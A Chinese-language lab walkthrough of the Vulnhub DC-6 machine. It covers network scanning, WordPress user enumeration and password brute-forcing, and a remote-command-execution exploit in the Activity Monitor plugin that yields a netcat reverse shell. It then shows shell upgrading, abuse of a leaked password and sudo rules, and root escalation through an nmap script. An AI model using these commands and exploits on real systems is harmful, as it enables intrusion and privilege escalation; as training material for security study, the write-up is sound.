渗透测试靶机vulnhub——DC6实战笔记
信息收集
.\fscan64.exe -h 192.168.1.0/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.1.1 is alive
(icmp) Target 192.168.1.53 is alive
(icmp) Target 192.168.1.100 is alive
(icmp) Target 192.168.1.108 is alive
(icmp) Target 192.168.1.110 is alive
(icmp) Target 192.168.1.104 is alive
[*] Icmp alive hosts len is: 6
192.168.1.108:7680 open
192.168.1.108:445 open
192.168.1.53:22 open
192.168.1.100:80 open
192.168.1.108:443 open
192.168.1.108:139 open
192.168.1.100:22 open
192.168.1.108:3306 open
192.168.1.108:135 open
192.168.1.1:80 open
[*] alive ports len is: 10
start vulscan
[*] NetInfo:
[*]192.168.1.108
[->]yesir
[->]192.168.1.108
[->]192.168.59.1
[->]192.168.56.1
[->]10.10.10.1
[->]10.10.1.1
[->]169.254.79.122
[*] WebTitle: https://192.168.1.108 code:403 len:0 title:None
[*] WebTitle: http://192.168.1.1 code:200 len:819 title:TL-WDR5660
[+] SSH:192.168.1.53:22:root 123456
[*] WebTitle: http://192.168.1.100 code:301 len:0 title:None 跳转url: http://wordy/
已完成 9/10 [-] ssh 192.168.1.100:22 root test ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 9/10 [-] ssh 192.168.1.100:22 root Aa123456! ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 9/10 [-] ssh 192.168.1.100:22 admin Passw0rd ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
发现目标主机192.168.1.100
访问跳转到http://wordy/,发现没有页面,需要更改hosts文件,加上 一行 192.168.1.100 wordy
nmap扫描端口
└─$ nmap -A 192.168.1.100 -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-05 16:21 CST
Nmap scan report for 192.168.1.100
Host is up (0.00025s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
| 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to http://wordy/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds
zsh: segmentation fault nmap -A 192.168.1.100 -p-
开放80,22端口,先访问80端口
收集网站信息
根据浏览器插件收集到的网站一些信息
看到目标网站用的是WordPress。
使用wpscan扫描发现以下用户
把用户保存在字典里,用户名已经成功扫出,我们用kali自带的字典当做密码文件,这里要注意一个细节,就是在官网的说明中,dc-6的字典是可以被筛检的,可以大大减少我们爆破的时间。
└─$ cat /usr/share/wordlists/rockyou.txt | grep k01 > pass.txt
爆破用户
└─$ wpscan --url http://wordy/ -U user.txt -P pass.txt
爆破成功密码helpdesk01,登录后台
发现插件
kali查找漏洞exp信息
漏洞利用
cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html #复制到桌面
vim 45274.html #进行编辑
修改两处记得把 -lnvp参数去掉
使用kali监听一下 nc -nlvp 192.168.1.53 9999
切换交互shell
python -c "import pty;pty.spawn('/bin/bash')"
在/home/mark/stuff
下发现一个文件,记录了用户graham
的密码GSo7isUM1D4
切换用户
sudo -l
使用nano命令,将原来的backups.sh脚本内容,修改为
/bin/sh
echo 'os.execute("/bin/bash")' > root.nse
之后使用命令:sudo -u jens /home/jens/backups.sh,运行脚本,得到jens权限的shell
进入/tmp
下面 nmap--script
参数可以执行脚本
echo 'os.execute("/bin/bash")'>getroot.sh
sudo nmap --script=getroot.sh
获取flag
总结
-
wpscan爆破用户密码
-
**
Activity monitor
**插件远程命令执行的漏洞 -
nmap脚本执行提权
若是你所期望的,那定会得到强烈的回应